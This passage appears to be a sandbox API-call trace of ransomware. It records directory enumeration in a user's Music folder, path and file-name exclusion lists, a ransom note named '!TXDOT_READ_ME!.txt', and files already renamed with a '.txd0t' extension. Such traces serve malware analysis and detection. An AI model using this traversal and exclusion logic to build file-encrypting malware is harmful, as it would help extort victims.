(lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\boot\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\perflogs\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\programdata\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\drivers\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\wsus\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="crypt_detect") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="cryptolocker") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="ransomware") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\WINDOWS") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="C:\\Program Files") returned 0x0 [0129.580] GetProcessHeap () returned 0xe30000 [0129.580] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f0) returned 0xef3600 [0129.580] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.581] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\*", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*" [0129.581] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bb0 [0129.581] StrCmpW (psz1=".", psz2=".") returned 0 [0129.581] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.581] StrCmpW (psz1="..", psz2=".") returned 1 [0129.581] StrCmpW (psz1="..", psz2="..") returned 0 [0129.581] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d123e3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51d123e3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.581] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.581] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.581] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.581] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.581] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt" [0129.581] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.581] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.581] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.581] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x556ab80, ftCreationTime.dwHighDateTime=0x1d5e971, ftLastAccessTime.dwLowDateTime=0x40fcd280, ftLastAccessTime.dwHighDateTime=0x1d5e413, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4854, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="0JKj5_ifBaM.wav.txd0t", cAlternateFileName="0JKJ5_~1.TXD")) returned 1 [0129.581] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2=".") returned 1 [0129.581] StrCmpW (psz1="0JKj5_ifBaM.wav.txd0t", psz2="..") returned 1 [0129.581] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="0JKj5_ifBaM.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\0JKj5_ifBaM.wav.txd0t" [0129.582] PathFindExtensionW (pszPath="0JKj5_ifBaM.wav.txd0t") returned=".txd0t" [0129.582] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.582] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d44f7a0, ftCreationTime.dwHighDateTime=0x1d5e4a9, ftLastAccessTime.dwLowDateTime=0x35d78040, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x51d385b1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1215e, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="3MXWb597R4.mp3.txd0t", cAlternateFileName="3MXWB5~1.TXD")) returned 1 [0129.582] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2=".") returned 1 [0129.582] StrCmpW (psz1="3MXWb597R4.mp3.txd0t", psz2="..") returned 1 [0129.582] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="3MXWb597R4.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t" [0129.582] PathFindExtensionW (pszPath="3MXWb597R4.mp3.txd0t") returned=".txd0t" [0129.582] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.582] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b39650, ftCreationTime.dwHighDateTime=0x1d5ed09, ftLastAccessTime.dwLowDateTime=0x7e8f770, ftLastAccessTime.dwHighDateTime=0x1d5ec98, ftLastWriteTime.dwLowDateTime=0x51d5e873, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16214, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="BhtHzSyEfD5ggEidkz.wav.txd0t", cAlternateFileName="BHTHZS~1.TXD")) returned 1 [0129.582] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2=".") returned 1 [0129.582] StrCmpW (psz1="BhtHzSyEfD5ggEidkz.wav.txd0t", psz2="..") returned 1 [0129.582] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="BhtHzSyEfD5ggEidkz.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t" [0129.582] PathFindExtensionW (pszPath="BhtHzSyEfD5ggEidkz.wav.txd0t") returned=".txd0t" [0129.582] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.582] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f497d20, ftCreationTime.dwHighDateTime=0x1d5e23f, ftLastAccessTime.dwLowDateTime=0xed9388f0, ftLastAccessTime.dwHighDateTime=0x1d5e214, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15b75, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cAlternateFileName="FJIKXU~1.TXD")) returned 1 [0129.582] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2=".") returned 1 [0129.582] StrCmpW (psz1="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", psz2="..") returned 1 [0129.582] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t" [0129.582] PathFindExtensionW (pszPath="fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned=".txd0t" [0129.582] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.582] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe94b7da0, ftCreationTime.dwHighDateTime=0x1d5e446, ftLastAccessTime.dwLowDateTime=0x1b174e50, ftLastAccessTime.dwHighDateTime=0x1d5e92d, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x625d, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="lwEeZe6NJKctwuGef3c.mp3.txd0t", cAlternateFileName="LWEEZE~1.TXD")) returned 1 [0129.582] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2=".") returned 1 [0129.582] StrCmpW (psz1="lwEeZe6NJKctwuGef3c.mp3.txd0t", psz2="..") returned 1 [0129.582] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.582] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="lwEeZe6NJKctwuGef3c.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t" [0129.583] PathFindExtensionW (pszPath="lwEeZe6NJKctwuGef3c.mp3.txd0t") returned=".txd0t" [0129.583] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.583] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05ec6d0, ftCreationTime.dwHighDateTime=0x1d5e424, ftLastAccessTime.dwLowDateTime=0x3cacaa30, ftLastAccessTime.dwHighDateTime=0x1d5eef3, ftLastWriteTime.dwLowDateTime=0x51daad40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18443, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="o_54eDamWws3.mp3.txd0t", cAlternateFileName="O_54ED~1.TXD")) returned 1 [0129.583] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", psz2=".") returned 1 [0129.583] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", psz2="..") returned 1 [0129.583] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="o_54eDamWws3.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t" [0129.583] PathFindExtensionW (pszPath="o_54eDamWws3.mp3.txd0t") returned=".txd0t" [0129.583] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.583] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70852950, ftCreationTime.dwHighDateTime=0x1d5ec0e, ftLastAccessTime.dwLowDateTime=0x6056c510, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ce3, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="rWrYpfOfe9_Zr8omah.mp3.txd0t", cAlternateFileName="RWRYPF~1.TXD")) returned 1 [0129.583] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2=".") returned 1 [0129.583] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2="..") returned 1 [0129.583] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="rWrYpfOfe9_Zr8omah.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t" [0129.583] PathFindExtensionW (pszPath="rWrYpfOfe9_Zr8omah.mp3.txd0t") returned=".txd0t" [0129.583] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.583] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 1 [0129.583] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2=".") returned 1 [0129.583] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2="..") returned 1 [0129.583] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0129.583] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="Wv1ct5mSPlb.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t" [0129.583] PathFindExtensionW (pszPath="Wv1ct5mSPlb.wav.txd0t") returned=".txd0t" [0129.583] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.583] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 0 [0129.583] FindClose (in: hFindFile=0xec1bb0 | out: hFindFile=0xec1bb0) returned 1 [0129.583] GetProcessHeap () returned 0xe30000 [0129.583] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 